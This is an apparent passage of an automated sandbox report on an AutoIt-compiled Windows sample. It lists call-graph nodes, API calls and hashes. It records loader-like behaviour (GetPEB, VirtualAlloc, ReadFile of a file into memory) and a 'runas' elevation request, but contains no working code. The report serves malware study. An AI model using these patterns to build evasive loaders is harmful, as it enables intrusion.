97327->97335 97330 e37510 53 API calls 97329->97330 97331 ea1108 97330->97331 97332 e36350 22 API calls 97331->97332 97332->97335 97336 e3b270 39 API calls 97333->97336 97335->97323 97336->97335 97337->97329 97338 e31cad SystemParametersInfoW 97339 e31033 97344 e34c91 97339->97344 97343 e31042 97345 e3a961 22 API calls 97344->97345 97346 e34cff 97345->97346 97352 e33af0 97346->97352 97349 e34d9c 97350 e31038 97349->97350 97355 e351f7 22 API calls __fread_nolock 97349->97355 97351 e500a3 29 API calls __onexit 97350->97351 97351->97343 97356 e33b1c 97352->97356 97355->97349 97357 e33b0f 97356->97357 97358 e33b29 97356->97358 97357->97349 97358->97357 97359 e33b30 RegOpenKeyExW 97358->97359 97359->97357 97360 e33b4a RegQueryValueExW 97359->97360 97361 e33b80 RegCloseKey 97360->97361 97362 e33b6b 97360->97362 97361->97357 97362->97361 97363 148967b 97366 14892f0 97363->97366 97365 14896c7 97379 1486d20 97366->97379 97369 14893c0 CreateFileW 97370 148938f 97369->97370 97373 14893cd 97369->97373 97371 14893e9 VirtualAlloc 97370->97371 97370->97373 97377 14894f0 CloseHandle 97370->97377 97378 1489500 VirtualFree 97370->97378 97382 148a200 GetPEB 97370->97382 97372 148940a ReadFile 97371->97372 97371->97373 97372->97373 97376 1489428 VirtualAlloc 97372->97376 97374 14895ea 97373->97374 97375 14895dc VirtualFree 97373->97375 97374->97365 97375->97374 97376->97370 97376->97373 97377->97370 97378->97370 97384 148a1a0 GetPEB 97379->97384 97381 14873ab 97381->97370 97383 148a22a 97382->97383 97383->97369 97385 148a1ca 97384->97385 97385->97381 97386 e32e37 97387 e3a961 22 API calls 97386->97387 97388 e32e4d 97387->97388 97465 e34ae3 97388->97465 97390 e32e6b 97391 e33a5a 24 API calls 97390->97391 97392 e32e7f 97391->97392 97393 e39cb3 22 API calls 97392->97393 97394 e32e8c 97393->97394 97395 e34ecb 94 API calls 97394->97395 97396 e32ea5 97395->97396 97397 e72cb0 97396->97397 97398 e32ead 97396->97398 97399 ea2cf9 80 API calls 97397->97399 97401 e3a8c7 22 API calls 97398->97401 97400 e72cc3 97399->97400 97402 e72ccf 97400->97402 97404 e34f39 68 API calls 97400->97404 97403 e32ec3 97401->97403 97407 e34f39 68 API calls 97402->97407 97479 e36f88 22 API calls 97403->97479 97404->97402 97406 e32ecf 97409 e39cb3 22 API calls 97406->97409 97408 e72ce5 97407->97408 97495 e33084 22 API calls 97408->97495 97410 e32edc 97409->97410 97480 e3a81b 41 API calls 97410->97480 97413 e32eec 97415 e39cb3 22 API calls 97413->97415 97414 e72d02 97496 e33084 22 API calls 97414->97496 97417 e32f12 97415->97417 97481 e3a81b 41 API calls 97417->97481 97418 e72d1e 97420 e33a5a 24 API calls 97418->97420 97422 e72d44 97420->97422 97421 e32f21 97424 e3a961 22 API calls 97421->97424 97497 e33084 22 API calls 97422->97497 97426 e32f3f 97424->97426 97425 e72d50 97427 e3a8c7 22 API calls 97425->97427 97482 e33084 22 API calls 97426->97482 97428 e72d5e 97427->97428 97498 e33084 22 API calls 97428->97498 97431 e32f4b 97483 e54a28 40 API calls 3 library calls 97431->97483 97432 e72d6d 97436 e3a8c7 22 API calls 97432->97436 97434 e32f59 97434->97408 97435 e32f63 97434->97435 97484 e54a28 40 API calls 3 library calls 97435->97484 97438 e72d83 97436->97438 97499 e33084 22 API calls 97438->97499 97439 e32f6e 97439->97414 97441 e32f78 97439->97441 97485 e54a28 40 API calls 3 library calls 97441->97485 97442 e72d90 97444 e32f83 97444->97418 97445 e32f8d 97444->97445 97486 e54a28 40 API calls 3 library calls 97445->97486 97447 e32f98 97448 e32fdc 97447->97448 97487 e33084 22 API calls 97447->97487 97448->97432 97449 e32fe8 97448->97449 97449->97442 97489 e363eb 22 API calls 97449->97489 97451 e32fbf 97453 e3a8c7 22 API calls 97451->97453 97455 e32fcd 97453->97455 97454 e32ff8 97490 e36a50 22 API calls 97454->97490 97488 e33084 22 API calls 97455->97488 97457 e33006 97491 e370b0 23 API calls 97457->97491 97462 e33021 97463 e33065 97462->97463 97492 e36f88 22 API calls 97462->97492 97493 e370b0 23 API calls 97462->97493 97494 e33084 22 API calls 97462->97494 97466 e34af0 __wsopen_s 97465->97466 97467 e36b57 22 API calls 97466->97467 97468 e34b22 97466->97468 97467->97468 97478 e34b58 97468->97478 97500 e34c6d 97468->97500 97470 e39cb3 22 API calls 97472 e34c52 97470->97472 97471 e39cb3 22 API calls 97471->97478 97473 e3515f 22 API calls 97472->97473 97476 e34c5e 97473->97476 97474 e34c6d 22 API calls 97474->97478 97475 e3515f 22 API calls 97475->97478 97476->97390 97477 e34c29 97477->97470 97477->97476 97478->97471 97478->97474 97478->97475 97478->97477 97479->97406 97480->97413 97481->97421 97482->97431 97483->97434 97484->97439 97485->97444 97486->97447 97487->97451 97488->97448 97489->97454 97490->97457 97491->97462 97492->97462 97493->97462 97494->97462 97495->97414 97496->97418 97497->97425 97498->97432 97499->97442 97501 e3aec9 22 API calls 97500->97501 97502 e34c78 97501->97502 97502->97468 97503 e33156 97506 e33170 97503->97506 97507 e33187 97506->97507 97508 e331eb 97507->97508 97509 e3318c 97507->97509 97545 e331e9 97507->97545 97511 e331f1 97508->97511 97512 e72dfb 97508->97512 97513 e33265 PostQuitMessage 97509->97513 97514 e33199 97509->97514 97510 e331d0 DefWindowProcW 97547 e3316a 97510->97547 97515 e331f8 97511->97515 97516 e3321d SetTimer RegisterWindowMessageW 97511->97516 97555 e318e2 10 API calls 97512->97555 97513->97547 97518 e331a4 97514->97518 97519 e72e7c 97514->97519 97520 e33201 KillTimer 97515->97520 97521 e72d9c 97515->97521 97523 e33246 CreatePopupMenu 97516->97523 97516->97547 97524 e331ae 97518->97524 97525 e72e68 97518->97525 97560 e9bf30 34 API calls ___scrt_fastfail 97519->97560 97551 e330f2 Shell_NotifyIconW ___scrt_fastfail 97520->97551 97527 e72dd7 MoveWindow 97521->97527 97528 e72da1 97521->97528 97522 e72e1c 97556 e4e499 42 API calls 97522->97556 97523->97547 97532 e72e4d 97524->97532 97533 e331b9 97524->97533 97559 e9c161 27 API calls ___scrt_fastfail 97525->97559 97527->97547 97535 e72da7 97528->97535 97536 e72dc6 SetFocus 97528->97536 97532->97510 97558 e90ad7 22 API calls 97532->97558 97538 e33253 97533->97538 97543 e331c4 97533->97543 97534 e72e8e 97534->97510 97534->97547 97539 e72db0 97535->97539 97535->97543 97536->97547 97537 e33214 97552 e33c50 DeleteObject DestroyWindow 97537->97552 97553 e3326f 44 API calls ___scrt_fastfail 97538->97553 97554 e318e2 10 API calls 97539->97554 97543->97510 97557 e330f2 Shell_NotifyIconW ___scrt_fastfail 97543->97557 97545->97510 97546 e33263 97546->97547 97549 e72e41 97550 e33837 49 API calls 97549->97550 97550->97545 97551->97537 97552->97547 97553->97546 97554->97547 97555->97522 97556->97543 97557->97549 97558->97545 97559->97546 97560->97534 97561 e3105b 97566 e3344d 97561->97566 97563 e3106a 97597 e500a3 29 API calls __onexit 97563->97597 97565 e31074 97567 e3345d __wsopen_s 97566->97567 97568 e3a961 22 API calls 97567->97568 97569 e33513 97568->97569 97570 e33a5a 24 API calls 97569->97570 97571 e3351c 97570->97571 97598 e33357 97571->97598 97574 e333c6 22 API calls 97575 e33535 97574->97575 97576 e3515f 22 API calls 97575->97576 97577 e33544 97576->97577 97578 e3a961 22 API calls 97577->97578 97579 e3354d 97578->97579 97580 e3a6c3 22 API calls 97579->97580 97581 e33556 RegOpenKeyExW 97580->97581 97582 e73176 RegQueryValueExW 97581->97582 97586 e33578 97581->97586 97583 e73193 97582->97583 97584 e7320c RegCloseKey 97582->97584 97585 e4fe0b 22 API calls 97583->97585 97584->97586 97596 e7321e _wcslen 97584->97596 97587 e731ac 97585->97587 97586->97563 97588 e35722 22 API calls 97587->97588 97589 e731b7 RegQueryValueExW 97588->97589 97590 e731d4 97589->97590 97593 e731ee messages 97589->97593 97591 e36b57 22 API calls 97590->97591 97591->97593 97592 e34c6d 22 API calls 97592->97596 97593->97584 97594 e39cb3 22 API calls 97594->97596 97595 e3515f 22 API calls 97595->97596 97596->97586 97596->97592 97596->97594 97596->97595 97597->97565 97599 e71f50 __wsopen_s 97598->97599 97600 e33364 GetFullPathNameW 97599->97600 97601 e33386 97600->97601 97602 e36b57 22 API calls 97601->97602 97603 e333a4 97602->97603 97603->97574 97604 14890d0 97605 1486d20 GetPEB 97604->97605 97606 1489176 97605->97606 97618 1488fc0 97606->97618 97608 148919f CreateFileW 97610 14891ee 97608->97610 97611 14891f3 97608->97611 97611->97610 97612 148920a VirtualAlloc 97611->97612 97612->97610 97613 1489228 ReadFile 97612->97613 97613->97610 97614 1489243 97613->97614 97615 1487fc0 13 API calls 97614->97615 97616 1489276 97615->97616 97617 1489299 ExitProcess 97616->97617 97617->97610 97619 1488fc9 Sleep 97618->97619 97620 1488fd7 97619->97620 97621 e31098 97626 e342de 97621->97626 97625 e310a7 97627 e3a961 22 API calls 97626->97627 97628 e342f5 GetVersionExW 97627->97628 97629 e36b57 22 API calls 97628->97629 97630 e34342 97629->97630 97631 e393b2 22 API calls 97630->97631 97643 e34378 97630->97643 97632 e3436c 97631->97632 97634 e337a0 22 API calls 97632->97634 97633 e3441b GetCurrentProcess IsWow64Process 97635 e34437 97633->97635 97634->97643 97636 e73824 GetSystemInfo 97635->97636 97637 e3444f LoadLibraryA 97635->97637 97638 e34460 GetProcAddress 97637->97638 97639 e3449c GetSystemInfo 97637->97639 97638->97639 97642 e34470 GetNativeSystemInfo 97638->97642 97640 e34476 97639->97640 97644 e3109d 97640->97644 97645 e3447a FreeLibrary 97640->97645 97641 e737df 97642->97640 97643->97633 97643->97641 97646 e500a3 29 API calls __onexit 97644->97646 97645->97644 97646->97625 97647 e3f7bf 97648 e3f7d3 97647->97648 97649 e3fcb6 97647->97649 97650 e3fcc2 97648->97650 97652 e4fddb 22 API calls 97648->97652 97684 e3aceb 23 API calls messages 97649->97684 97685 e3aceb 23 API calls messages 97650->97685 97654 e3f7e5 97652->97654 97654->97650 97655 e3f83e 97654->97655 97656 e3fd3d 97654->97656 97658 e41310 207 API calls 97655->97658 97680 e3ed9d messages 97655->97680 97686 ea1155 22 API calls 97656->97686 97679 e3ec76 messages 97658->97679 97659 e3fef7 97667 e3a8c7 22 API calls 97659->97667 97659->97680 97662 e4fddb 22 API calls 97662->97679 97663 e84600 97669 e3a8c7 22 API calls 97663->97669 97663->97680 97664 e84b0b 97688 ea359c 82 API calls __wsopen_s 97664->97688 97665 e3a8c7 22 API calls 97665->97679 97667->97680 97669->97680 97671 e50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97671->97679 97672 e3fbe3 97674 e84bdc 97672->97674 97672->97680 97681 e3f3ae messages 97672->97681 97673 e3a961 22 API calls 97673->97679 97689 ea359c 82 API calls __wsopen_s 97674->97689 97676 e84beb 97690 ea359c 82 API calls __wsopen_s 97676->97690 97677 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97677->97679 97678 e500a3 29 API calls pre_c_initialization 97678->97679 97679->97659 97679->97662 97679->97663 97679->97664 97679->97665 97679->97671 97679->97672 97679->97673 97679->97676 97679->97677 97679->97678 97679->97680 97679->97681 97682 e401e0 207 API calls 2 library calls 97679->97682 97683 e406a0 41 API calls messages 97679->97683 97681->97680 97687 ea359c 82 API calls __wsopen_s 97681->97687 97682->97679 97683->97679 97684->97650 97685->97656 97686->97680 97687->97680 97688->97680 97689->97676 97690->97680 97691 e503fb 97692 e50407 ___scrt_is_nonwritable_in_current_image 97691->97692 97720 e4feb1 97692->97720 97694 e5040e 97695 e50561 97694->97695 97698 e50438 97694->97698 97747 e5083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97695->97747 97697 e50568 97748 e54e52 28 API calls _abort 97697->97748 97709 e50477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97698->97709 97731 e6247d 97698->97731 97700 e5056e 97749 e54e04 28 API calls _abort 97700->97749 97704 e50576 97705 e50457 97707 e504d8 97739 e50959 97707->97739 97709->97707 97743 e54e1a 38 API calls 3 library calls 97709->97743 97711 e504de 97712 e504f3 97711->97712 97744 e50992 GetModuleHandleW 97712->97744 97714 e504fa 97714->97697 97715 e504fe 97714->97715 97716 e50507 97715->97716 97745 e54df5 28 API calls _abort 97715->97745 97746 e50040 13 API calls 2 library calls 97716->97746 97719 e5050f 97719->97705 97721 e4feba 97720->97721 97750 e50698 IsProcessorFeaturePresent 97721->97750 97723 e4fec6 97751 e52c94 10 API calls 3 library calls 97723->97751 97725 e4fecb 97730 e4fecf 97725->97730 97752 e62317 97725->97752 97727 e4fee6 97727->97694 97730->97694 97734 e62494 97731->97734 97732 e50a8c _ValidateLocalCookies 5 API calls 97733 e50451 97732->97733 97733->97705 97735 e62421 97733->97735 97734->97732 97738 e62450 97735->97738 97736 e50a8c _ValidateLocalCookies 5 API calls 97737 e62479 97736->97737 97737->97709 97738->97736 97803 e52340 97739->97803 97742 e5097f 97742->97711 97743->97707 97744->97714 97745->97716 97746->97719 97747->97697 97748->97700 97749->97704 97750->97723 97751->97725 97756 e6d1f6 97752->97756 97755 e52cbd 8 API calls 3 library calls 97755->97730 97758 e6d20f 97756->97758 97760 e6d213 97756->97760 97774 e50a8c 97758->97774 97759 e4fed8 97759->97727 97759->97755 97760->97758 97762 e64bfb 97760->97762 97763 e64c07 ___scrt_is_nonwritable_in_current_image 97762->97763 97781 e62f5e EnterCriticalSection 97763->97781 97765 e64c0e 97782 e650af 97765->97782 97767 e64c1d 97768 e64c2c 97767->97768 97795 e64a8f 29 API calls 97767->97795 97797 e64c48 LeaveCriticalSection _abort 97768->97797 97771 e64c27 97796 e64b45 GetStdHandle GetFileType 97771->97796 97772 e64c3d __wsopen_s 97772->97760 97775 e50a95 97774->97775 97776 e50a97 IsProcessorFeaturePresent 97774->97776 97775->97759 97778 e50c5d 97776->97778 97802 e50c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97778->97802 97780 e50d40 97780->97759 97781->97765 97783 e650bb ___scrt_is_nonwritable_in_current_image 97782->97783 97784 e650df 97783->97784 97785 e650c8 97783->97785 97798 e62f5e EnterCriticalSection 97784->97798 97799 e5f2d9 20 API calls _abort 97785->97799 97788 e650cd 97800 e627ec 26 API calls ___std_exception_copy 97788->97800 97790 e650d7 __wsopen_s 97790->97767 97791 e65117 97801 e6513e LeaveCriticalSection _abort 97791->97801 97793 e650eb 97793->97791 97794 e65000 __wsopen_s 21 API calls 97793->97794 97794->97793 97795->97771 97796->97768 97797->97772 97798->97793 97799->97788 97800->97790 97801->97790 97802->97780 97804 e5096c GetStartupInfoW 97803->97804 97804->97742

                                                      Executed Functions

                                                      Function 00E342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 236 e342de-e3434d call e3a961 GetVersionExW call e36b57 241 e73617-e7362a 236->241 242 e34353 236->242 243 e7362b-e7362f 241->243 244 e34355-e34357 242->244 245 e73632-e7363e 243->245 246 e73631 243->246 247 e73656 244->247 248 e3435d-e343bc call e393b2 call e337a0 244->248 245->243 249 e73640-e73642 245->249 246->245 252 e7365d-e73660 247->252 262 e343c2-e343c4 248->262 263 e737df-e737e6 248->263 249->244 251 e73648-e7364f 249->251 251->241 254 e73651 251->254 255 e73666-e736a8 252->255 256 e3441b-e34435 GetCurrentProcess IsWow64Process 252->256 254->247 255->256 261 e736ae-e736b1 255->261 259 e34437 256->259 260 e34494-e3449a 256->260 264 e3443d-e34449 259->264 260->264 265 e736b3-e736bd 261->265 266 e736db-e736e5 261->266 262->252 269 e343ca-e343dd 262->269 270 e73806-e73809 263->270 271 e737e8 263->271 274 e73824-e73828 GetSystemInfo 264->274 275 e3444f-e3445e LoadLibraryA 264->275 267 e736bf-e736c5 265->267 268 e736ca-e736d6 265->268 272 e736e7-e736f3 266->272 273 e736f8-e73702 266->273 267->256 268->256 276 e343e3-e343e5 269->276 277 e73726-e7372f 269->277 281 e737f4-e737fc 270->281 282 e7380b-e7381a 270->282 278 e737ee 271->278 272->256 279 e73715-e73721 273->279 280 e73704-e73710 273->280 283 e34460-e3446e GetProcAddress 275->283 284 e3449c-e344a6 GetSystemInfo 275->284 286 e343eb-e343ee 276->286 287 e7374d-e73762 276->287 288 e73731-e73737 277->288 289 e7373c-e73748 277->289 278->281 279->256 280->256 281->270 282->278 290 e7381c-e73822 282->290 283->284 291 e34470-e34474 GetNativeSystemInfo 283->291 285 e34476-e34478 284->285 296 e34481-e34493 285->296 297 e3447a-e3447b FreeLibrary 285->297 292 e73791-e73794 286->292 293 e343f4-e3440f 286->293 294 e73764-e7376a 287->294 295 e7376f-e7377b 287->295 288->256 289->256 290->281 291->285 292->256 300 e7379a-e737c1 292->300 298 e34415 293->298 299 e73780-e7378c 293->299 294->256 295->256 297->296 298->256 299->256 301 e737c3-e737c9 300->301 302 e737ce-e737da 300->302 301->256 302->256
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00E3430D
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • GetCurrentProcess.KERNEL32(?,00ECCB64,00000000,?,?), ref: 00E34422
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E34429
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E34454
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E34466
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00E34474
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E3447B
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00E344A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: af93d59bd1fe26f516c864465754c24b4ba35315859c810ef0830a5cde6ef1d8
                                                      • Instruction ID: 5451d6f3ec6a144b20ce3d5080327de9754e5d0141ac697deba5e5514165cc0f
                                                      • Opcode Fuzzy Hash: af93d59bd1fe26f516c864465754c24b4ba35315859c810ef0830a5cde6ef1d8
                                                      • Instruction Fuzzy Hash: F7A1C7B290A3CCDFC715C7B97C855D57FE47B26304F58A8A9E085B3A62D2305909FB22
                                                      Function 00E342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 555 e342a2-e342ba CreateStreamOnHGlobal 556 e342da-e342dd 555->556 557 e342bc-e342d3 FindResourceExW 555->557 558 e342d9 557->558 559 e735ba-e735c9 LoadResource 557->559 558->556 559->558 560 e735cf-e735dd SizeofResource 559->560 560->558 561 e735e3-e735ee LockResource 560->561 561->558 562 e735f4-e735fc 561->562 563 e73600-e73612 562->563 563->558
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E350AA,?,?,00000000,00000000), ref: 00E342B2
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E350AA,?,?,00000000,00000000), ref: 00E342C9
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00E350AA,?,?,00000000,00000000,?,?,?,?,?,?,00E34F20), ref: 00E735BE
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00E350AA,?,?,00000000,00000000,?,?,?,?,?,?,00E34F20), ref: 00E735D3
                                                      • LockResource.KERNEL32(00E350AA,?,?,00E350AA,?,?,00000000,00000000,?,?,?,?,?,?,00E34F20,?), ref: 00E735E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: df67f0af05fc5b909bda587a1b350ecc939197c7b3ba9770308b70bc6f82fb06
                                                      • Instruction ID: 023ae680c8105431de7dea77177df59efe60064233e01d197e527507d15d093b
                                                      • Opcode Fuzzy Hash: df67f0af05fc5b909bda587a1b350ecc939197c7b3ba9770308b70bc6f82fb06
                                                      • Instruction Fuzzy Hash: 88119E70200700AFD7259B66DC48F277BFDEBC5B51F244169F416A62A0DB72E805CA20
                                                      Function 00E72BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E32B6B
                                                        • Part of subcall function 00E33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F01418,?,00E32E7F,?,?,?,00000000), ref: 00E33A78
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00EF2224), ref: 00E72C10
                                                      • ShellExecuteW.SHELL32(00000000,?,?,00EF2224), ref: 00E72C17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                      • String ID: runas
                                                      • API String ID: 448630720-4000483414
                                                      • Opcode ID: 32bc9e79901fce2a62e53891cd878592b4f6222e405ed4ca6223fddfddc94f77
                                                      • Instruction ID: 4a635627fb76f0097e960a6e663dd2c807dea595950028adfab900753ecd8271
                                                      • Opcode Fuzzy Hash: 32bc9e79901fce2a62e53891cd878592b4f6222e405ed4ca6223fddfddc94f77
                                                      • Instruction Fuzzy Hash: D311AC312083456AC708FF70D85ADBEBFE4AB91304F54742DF296720A3CF618A0AD712
                                                      Function 00E3D730 Relevance: 21.6, APIs: 14, Instructions: 623sleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InputSleepStateTimetime
                                                      • String ID:
                                                      • API String ID: 4149333218-0
                                                      • Opcode ID: e27b2022d40d2d68ef31c7da14cc50b24be1332837657e24a3864901a3f3eba0
                                                      • Instruction ID: afb038934db3a71c00a7d9e5667bf94bdde0a90a0188deabf4b8d2b1995e04cc
                                                      • Opcode Fuzzy Hash: e27b2022d40d2d68ef31c7da14cc50b24be1332837657e24a3864901a3f3eba0
                                                      • Instruction Fuzzy Hash: 4042F230608341DFD729DF24DC48BAABBE0BF85308F14A55DE56AA7291D771E844CB92
                                                      Function 00E32CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E32D07
                                                      • RegisterClassExW.USER32(00000030), ref: 00E32D31
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E32D42
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E32D5F
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E32D6F
                                                      • LoadIconW.USER32(000000A9), ref: 00E32D85
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E32D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 9b3de31a242a2e8e2f5e95ac605f7142b51bc464e4b84018d15f95674d1c8fd8
                                                      • Instruction ID: 24f62efc2144c8b0015bb3accea9a616d4e516d86973a5f9bf9b716f87cb6c22
                                                      • Opcode Fuzzy Hash: 9b3de31a242a2e8e2f5e95ac605f7142b51bc464e4b84018d15f95674d1c8fd8
                                                      • Instruction Fuzzy Hash: 2F21A0B5901318AFDB009FA5ED49B9DBBB4FB08700F10412AE615B62A0D7B245569F91
                                                      Function 00E7065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 e7065b-e7068b call e7042f 307 e706a6-e706b2 call e65221 304->307 308 e7068d-e70698 call e5f2c6 304->308 314 e706b4-e706c9 call e5f2c6 call e5f2d9 307->314 315 e706cb-e70714 call e7039a 307->315 313 e7069a-e706a1 call e5f2d9 308->313 324 e7097d-e70983 313->324 314->313 322 e70716-e7071f 315->322 323 e70781-e7078a GetFileType 315->323 327 e70756-e7077c GetLastError call e5f2a3 322->327 328 e70721-e70725 322->328 329 e707d3-e707d6 323->329 330 e7078c-e707bd GetLastError call e5f2a3 CloseHandle 323->330 327->313 328->327 333 e70727-e70754 call e7039a 328->333 331 e707df-e707e5 329->331 332 e707d8-e707dd 329->332 330->313 341 e707c3-e707ce call e5f2d9 330->341 336 e707e9-e70837 call e6516a 331->336 337 e707e7 331->337 332->336 333->323 333->327 347 e70847-e7086b call e7014d 336->347 348 e70839-e70845 call e705ab 336->348 337->336 341->313 353 e7087e-e708c1 347->353 354 e7086d 347->354 348->347 355 e7086f-e70879 call e686ae 348->355 357 e708c3-e708c7 353->357 358 e708e2-e708f0 353->358 354->355 355->324 357->358 360 e708c9-e708dd 357->360 361 e708f6-e708fa 358->361 362 e7097b 358->362 360->358 361->362 363 e708fc-e7092f 